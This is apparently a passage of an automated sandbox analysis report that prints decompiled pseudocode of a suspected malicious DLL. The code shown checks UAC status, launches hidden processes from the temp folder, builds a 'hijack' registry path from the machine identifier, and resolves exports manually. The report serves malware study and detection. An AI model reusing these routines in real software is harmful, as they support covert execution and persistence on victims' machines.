                                                                                                                                                                  • Instruction ID: dabab85bc6ef052ed749d04d1e93e2dad56e743369109b7e858dc002110f0523
                                                                                                                                                                  • Opcode Fuzzy Hash: 47feec5f4e07d9a8727310987636f621792a510bfb959471694aa5da43594d6a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A516DBAD00218ABDB14DB98DC92FDE73B9EB4C304F044199E54997341EA31FB54CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001DC60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001DC60(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				struct _OSVERSIONINFOW _v284;
				char _v547;
				char _v548;
				char _v819;
				char _v820;
				char _v824;
				void* _t31;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t53;
				void* _t57;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t69 = __esi;
				_t68 = __edi;
				_t57 = __ebx;
				if(_a4 == 0) {
					return _t31;
				}
				_v820 = 0;
				E1000CF80(__edi,  &_v819, 0, 0x103);
				_v548 = 0;
				_t58 =  &_v547;
				E1000CF80(_t68,  &_v547, 0, 0x103);
				_t65 =  &(_v284.dwMajorVersion);
				E1000CF80(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
				_t74 = _t71 + 0x24;
				_v284.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v284);
				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D2A0() == 0) {
					_t38 = E1001D840(_t68,  &_v548);
					_t75 = _t74 + 4;
					__eflags = _t38;
					if(_t38 != 0) {
						L11:
						E1001D330(_t58,  &_v548);
						_t65 =  &_v820;
						_t41 = E1001CD50( &_v820, 0x104,  &_v824);
						_t77 = _t75 + 0x10;
						__eflags = _t41;
						if(_t41 >= 0) {
							_t65 = 0x104 - _v824;
							__eflags = 0x104;
							E1001CCB0( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
							_t77 = _t77 + 0xc;
						}
						goto L13;
					}
					_t49 = E1001D5C0(_t68,  &_v548);
					_t75 = _t75 + 4;
					__eflags = _t49;
					if(_t49 != 0) {
						goto L11;
					}
					_t58 =  &_v548;
					_t50 = E1001DAD0(_t68,  &_v548);
					_t75 = _t75 + 4;
					__eflags = _t50;
					if(_t50 != 0) {
						goto L11;
					}
					_t65 =  &_v548;
					_t51 = E1001D3D0(_t57, _t68, _t69,  &_v548);
					_t77 = _t75 + 4;
					__eflags = _t51;
					if(_t51 == 0) {
						goto L13;
					}
					goto L11;
				} else {
					_t53 = E1001DAD0(_t68,  &_v548);
					_t77 = _t74 + 4;
					_t84 = _t53;
					if(_t53 != 0) {
						_t65 =  &_v548;
						E1001D330( &_v548,  &_v548);
						E1001D380(_t84,  &_v820,  &_v548);
						_t77 = _t77 + 0xc;
					}
					L13:
					if(_v820 == 0) {
						_t65 =  &_v820;
						E1001D000("Mid2Failed", 0x104,  &_v820);
						_t77 = _t77 + 0xc;
					}
					return E1000D903(_t65, _a4, 0x104,  &_v820);
				}
			}























                                                                                                                                                                  0x1001dc60
                                                                                                                                                                  0x1001dc60
                                                                                                                                                                  0x1001dc60
                                                                                                                                                                  0x1001dc6d
                                                                                                                                                                  0x1001de14
                                                                                                                                                                  0x1001de14
                                                                                                                                                                  0x1001dc73
                                                                                                                                                                  0x1001dc88
                                                                                                                                                                  0x1001dc90
                                                                                                                                                                  0x1001dc9e
                                                                                                                                                                  0x1001dca5
                                                                                                                                                                  0x1001dcb4
                                                                                                                                                                  0x1001dcbb
                                                                                                                                                                  0x1001dcc0
                                                                                                                                                                  0x1001dcc3
                                                                                                                                                                  0x1001dcd4
                                                                                                                                                                  0x1001dce1
                                                                                                                                                                  0x1001dd39
                                                                                                                                                                  0x1001dd3e
                                                                                                                                                                  0x1001dd41
                                                                                                                                                                  0x1001dd43
                                                                                                                                                                  0x1001dd7e
                                                                                                                                                                  0x1001dd85
                                                                                                                                                                  0x1001dd99
                                                                                                                                                                  0x1001dda0
                                                                                                                                                                  0x1001dda5
                                                                                                                                                                  0x1001dda8
                                                                                                                                                                  0x1001ddaa
                                                                                                                                                                  0x1001ddbf
                                                                                                                                                                  0x1001ddbf
                                                                                                                                                                  0x1001ddcd
                                                                                                                                                                  0x1001ddd2
                                                                                                                                                                  0x1001ddd2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ddaa
                                                                                                                                                                  0x1001dd4c
                                                                                                                                                                  0x1001dd51
                                                                                                                                                                  0x1001dd54
                                                                                                                                                                  0x1001dd56
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dd58
                                                                                                                                                                  0x1001dd5f
                                                                                                                                                                  0x1001dd64
                                                                                                                                                                  0x1001dd67
                                                                                                                                                                  0x1001dd69
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dd6b
                                                                                                                                                                  0x1001dd72
                                                                                                                                                                  0x1001dd77
                                                                                                                                                                  0x1001dd7a
                                                                                                                                                                  0x1001dd7c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dcf5
                                                                                                                                                                  0x1001dcfc
                                                                                                                                                                  0x1001dd01
                                                                                                                                                                  0x1001dd04
                                                                                                                                                                  0x1001dd06
                                                                                                                                                                  0x1001dd08
                                                                                                                                                                  0x1001dd0f
                                                                                                                                                                  0x1001dd25
                                                                                                                                                                  0x1001dd2a
                                                                                                                                                                  0x1001dd2a
                                                                                                                                                                  0x1001ddd5
                                                                                                                                                                  0x1001ddde
                                                                                                                                                                  0x1001dde0
                                                                                                                                                                  0x1001ddf1
                                                                                                                                                                  0x1001ddf6
                                                                                                                                                                  0x1001ddf6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001de0e

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DC88
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DCA5
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DCBB
                                                                                                                                                                  • GetVersionExW.KERNEL32(00000114), ref: 1001DCD4
                                                                                                                                                                  • _strcpy_s.LIBCMT ref: 1001DE09
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegCloseKey.ADVAPI32(00000000), ref: 1001D319
                                                                                                                                                                    • Part of subcall function 1001DAD0: wsprintfW.USER32 ref: 1001DB1C
                                                                                                                                                                    • Part of subcall function 1001DAD0: CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
                                                                                                                                                                    • Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DB81
                                                                                                                                                                    • Part of subcall function 1001DAD0: DeviceIoControl.KERNEL32 ref: 1001DBB0
                                                                                                                                                                    • Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DBC8
                                                                                                                                                                    • Part of subcall function 1001DAD0: CloseHandle.KERNEL32(000000FF), ref: 1001DC14
                                                                                                                                                                    • Part of subcall function 1001D330: _strlen.LIBCMT ref: 1001D33E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$Close$ControlCreateDeviceFileHandleOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                                  • String ID: Mid2Failed
                                                                                                                                                                  • API String ID: 2934472556-1001836097
                                                                                                                                                                  • Opcode ID: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
                                                                                                                                                                  • Instruction ID: 1ac3354d9508f96bf62ada26ae39cff1003ebfb3b345a0bbc8a583754ab99eb2
                                                                                                                                                                  • Opcode Fuzzy Hash: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
                                                                                                                                                                  • Instruction Fuzzy Hash: 794142F5D0021967DB14F7A0AD86FEA7378EB14744F4405A9EA0899042FA70FBC8CA92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A230, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A230(void* __eflags, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				CHAR* _v24;
				struct _STARTUPINFOA _v100;
				void* _t27;

				_v24 = 0;
				E1000CF80(_t27,  &_v100, 0, 0x44);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 0;
				E1000CF80(_t27,  &_v20, 0, 0x10);
				if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20) != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					_v24 = 1;
				}
				return _v24;
			}







                                                                                                                                                                  0x1001a236
                                                                                                                                                                  0x1001a245
                                                                                                                                                                  0x1001a24d
                                                                                                                                                                  0x1001a254
                                                                                                                                                                  0x1001a25b
                                                                                                                                                                  0x1001a269
                                                                                                                                                                  0x1001a293
                                                                                                                                                                  0x1001a299
                                                                                                                                                                  0x1001a2a3
                                                                                                                                                                  0x1001a2a9
                                                                                                                                                                  0x1001a2a9
                                                                                                                                                                  0x1001a2b6

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                                  • String ID: D
                                                                                                                                                                  • API String ID: 1151464618-2746444292
                                                                                                                                                                  • Opcode ID: 7c2c5d68370ad68bcc3924ed5fcca5d5250c0e9b0e6499568d8da0f56ceb1a45
                                                                                                                                                                  • Instruction ID: 109a0bc55e8301458d6397c35f4bc98ddca4d2c3873fb5e4ea0d57c84511a1e7
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c2c5d68370ad68bcc3924ed5fcca5d5250c0e9b0e6499568d8da0f56ceb1a45
                                                                                                                                                                  • Instruction Fuzzy Hash: 1601E1B590431DABEB00DBD0DC89FEE7779FB44704F140518FA04AB281DBB5A958CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001AF10, Relevance: 8.9, APIs: 7, Instructions: 168COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001AF10(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _t105;
				void* _t174;
				void* _t176;

				_t172 = __edi;
				_t122 = __ebx;
				_v16 = _a4;
				_t4 = _v16 + 4; // 0x7d83ec45
				_v24 =  *_t4;
				_v12 = 0;
				_v20 =  *_v16 + 0x78;
				if( *((intOrPtr*)(_v20 + 4)) != 0) {
					_v8 = _v24 +  *_v20;
					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							if( *(_v8 + 0x18) != 0) {
								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
									L19:
									_t70 = _v16 + 0x30; // 0x51e84d8b
									_v28 = E1000DFB8(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AAC0);
									if(_v28 != 0) {
										_v12 =  *(_v28 + 4) & 0x0000ffff;
										L22:
										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
										}
										SetLastError(0x7f);
										return 0;
									}
									SetLastError(0x7f);
									return 0;
								}
								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
								_t105 = L1000CEAF(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
								_t176 = _t174 + 4;
								_v44 = _t105;
								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
								if(_v44 != 0) {
									_v32 = 0;
									while(_v32 <  *(_v8 + 0x18)) {
										 *_v44 = _v24 +  *_v36;
										 *((short*)(_v44 + 4)) =  *_v40;
										_v32 = _v32 + 1;
										_v36 = _v36 + 4;
										_v40 = _v40 + 2;
										_v44 = _v44 + 8;
									}
									_t66 = _v16 + 0x30; // 0x51e84d8b
									E1000DA30( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AAF0);
									_t174 = _t176 + 0x10;
									goto L19;
								}
								SetLastError(0xe);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L22;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}
















                                                                                                                                                                  0x1001af10
                                                                                                                                                                  0x1001af10
                                                                                                                                                                  0x1001af19
                                                                                                                                                                  0x1001af1f
                                                                                                                                                                  0x1001af22
                                                                                                                                                                  0x1001af25
                                                                                                                                                                  0x1001af34
                                                                                                                                                                  0x1001af3e
                                                                                                                                                                  0x1001af57
                                                                                                                                                                  0x1001af61
                                                                                                                                                                  0x1001af6e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001af7b
                                                                                                                                                                  0x1001af86
                                                                                                                                                                  0x1001afca
                                                                                                                                                                  0x1001afe7
                                                                                                                                                                  0x1001b0a9
                                                                                                                                                                  0x1001b0ba
                                                                                                                                                                  0x1001b0ca
                                                                                                                                                                  0x1001b0d1
                                                                                                                                                                  0x1001b0e6
                                                                                                                                                                  0x1001b0e9
                                                                                                                                                                  0x1001b0f2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b112
                                                                                                                                                                  0x1001b0f6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b0fc
                                                                                                                                                                  0x1001b0d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b0db
                                                                                                                                                                  0x1001aff6
                                                                                                                                                                  0x1001b002
                                                                                                                                                                  0x1001b00f
                                                                                                                                                                  0x1001b014
                                                                                                                                                                  0x1001b017
                                                                                                                                                                  0x1001b020
                                                                                                                                                                  0x1001b027
                                                                                                                                                                  0x1001b038
                                                                                                                                                                  0x1001b065
                                                                                                                                                                  0x1001b07b
                                                                                                                                                                  0x1001b086
                                                                                                                                                                  0x1001b047
                                                                                                                                                                  0x1001b050
                                                                                                                                                                  0x1001b059
                                                                                                                                                                  0x1001b062
                                                                                                                                                                  0x1001b062
                                                                                                                                                                  0x1001b09d
                                                                                                                                                                  0x1001b0a1
                                                                                                                                                                  0x1001b0a6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b0a6
                                                                                                                                                                  0x1001b02b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b031
                                                                                                                                                                  0x1001afce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001afd4
                                                                                                                                                                  0x1001af99
                                                                                                                                                                  0x1001afbb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001afbb
                                                                                                                                                                  0x1001af9d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001afa3
                                                                                                                                                                  0x1001af61
                                                                                                                                                                  0x1001af42
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF42
                                                                                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF6E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                  • Opcode ID: 5f9b1837587a101ea96a0657a83a7c2693123edf5df009f3321dc1919bef460e
                                                                                                                                                                  • Instruction ID: 27e70c85a8907a9ba83dd9d1e295feb5005e929d9b7098f35adbadc5d796aaa6
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f9b1837587a101ea96a0657a83a7c2693123edf5df009f3321dc1919bef460e
                                                                                                                                                                  • Instruction Fuzzy Hash: 3371C374A00109EFDB08CF98C995AAEB7F1FF49304F618599E915AB345D734EA81CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001FE50, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                  			E1001FE50(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E1002319D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF80(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF80(_t41,  &_v311, 0, 0x103);
				E1001A660(__ebx, _t41, __esi, _t50,  &_v44);
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push(E100011E0( &_v44));
				E1000CCA3(_t41,  &_v312, "%s%s 200 %s",  &_v576);
				E1001A230(_t50,  &_v312);
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                                  0x1001fe50
                                                                                                                                                                  0x1001fe50
                                                                                                                                                                  0x1001fe53
                                                                                                                                                                  0x1001fe55
                                                                                                                                                                  0x1001fe60
                                                                                                                                                                  0x1001fe61
                                                                                                                                                                  0x1001fe6e
                                                                                                                                                                  0x1001fe75
                                                                                                                                                                  0x1001fe8a
                                                                                                                                                                  0x1001fe92
                                                                                                                                                                  0x1001fea7
                                                                                                                                                                  0x1001feb3
                                                                                                                                                                  0x1001fec7
                                                                                                                                                                  0x1001fed5
                                                                                                                                                                  0x1001fede
                                                                                                                                                                  0x1001fef2
                                                                                                                                                                  0x1001ff01
                                                                                                                                                                  0x1001ff0c
                                                                                                                                                                  0x1001ff11
                                                                                                                                                                  0x1001ff1b
                                                                                                                                                                  0x1001ff23
                                                                                                                                                                  0x1001ff2d

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FE8A
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FEA7
                                                                                                                                                                    • Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                    • Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FEC7
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FEF2
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
                                                                                                                                                                    • Part of subcall function 1001A230: CreateProcessA.KERNEL32 ref: 1001A28B
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                                  • String ID: %s%s 200 %s
                                                                                                                                                                  • API String ID: 3552933064-2772210913
                                                                                                                                                                  • Opcode ID: c5a6d00ce3aa5ea66f22295ded407cf218970161439a2ab676f88754d585d496
                                                                                                                                                                  • Instruction ID: fca78508d4ffe10e775a72f73cdab82aabd77a27c247e381faabbd00212866fc
                                                                                                                                                                  • Opcode Fuzzy Hash: c5a6d00ce3aa5ea66f22295ded407cf218970161439a2ab676f88754d585d496
                                                                                                                                                                  • Instruction Fuzzy Hash: C61186B6C00208ABEB14EBA0DC56FDD7778EB14750F4441A4F619A61C5EB787748CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001F9F0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E1001F9F0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v275;
				char _v276;
				void* __ebp;
				void* _t20;
				void* _t37;

				_t37 = __eflags;
				_t28 = __edi;
				_v276 = 0;
				E1000CF80(__edi,  &_v275, 0, 0x103);
				_v12 = 0x104;
				E1001A350( &_v276,  &_v12);
				E1000CDB3( &_v276,  &_v276, 0x104, "hijack");
				_v8 = E1001A4E0(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
				_t20 = E1000CCA3(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
				_t38 = _v8;
				if(_v8 != 0) {
					_push(_v8);
					return E1000CA40(__ebx, _t28, __esi, _t38);
				}
				return _t20;
			}










                                                                                                                                                                  0x1001f9f0
                                                                                                                                                                  0x1001f9f0
                                                                                                                                                                  0x1001f9f9
                                                                                                                                                                  0x1001fa0e
                                                                                                                                                                  0x1001fa16
                                                                                                                                                                  0x1001fa28
                                                                                                                                                                  0x1001fa41
                                                                                                                                                                  0x1001fa58
                                                                                                                                                                  0x1001fa68
                                                                                                                                                                  0x1001fa70
                                                                                                                                                                  0x1001fa74
                                                                                                                                                                  0x1001fa79
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001fa7f
                                                                                                                                                                  0x1001fa85

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FA0E
                                                                                                                                                                    • Part of subcall function 1001A350: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FA41
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FA68
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                                  • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                                  • API String ID: 3138967372-3622423033
                                                                                                                                                                  • Opcode ID: ab9e3645ffe6a09c5898803410f9ba2ac02775f5c504d206e634dc87c7f5ca2e
                                                                                                                                                                  • Instruction ID: 9d0dca558a4647b1c94e9ab51dbd61ee89e2acb8972101442078f4140e755168
                                                                                                                                                                  • Opcode Fuzzy Hash: ab9e3645ffe6a09c5898803410f9ba2ac02775f5c504d206e634dc87c7f5ca2e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F0152F9C0020CA7DB15D7A0EC46FE97778AB54304F0404A9A61856141E7B5AB88C792
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001D2A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001D2A0() {
				void* _v8;
				int _v12;
				signed int _v16;
				int _v20;
				char _v24;

				_v12 = 4;
				_v20 = 4;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20) == 0) {
						_v16 = 0 | _v24 == 0x00000001;
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}








                                                                                                                                                                  0x1001d2a6
                                                                                                                                                                  0x1001d2ad
                                                                                                                                                                  0x1001d2b4
                                                                                                                                                                  0x1001d2bb
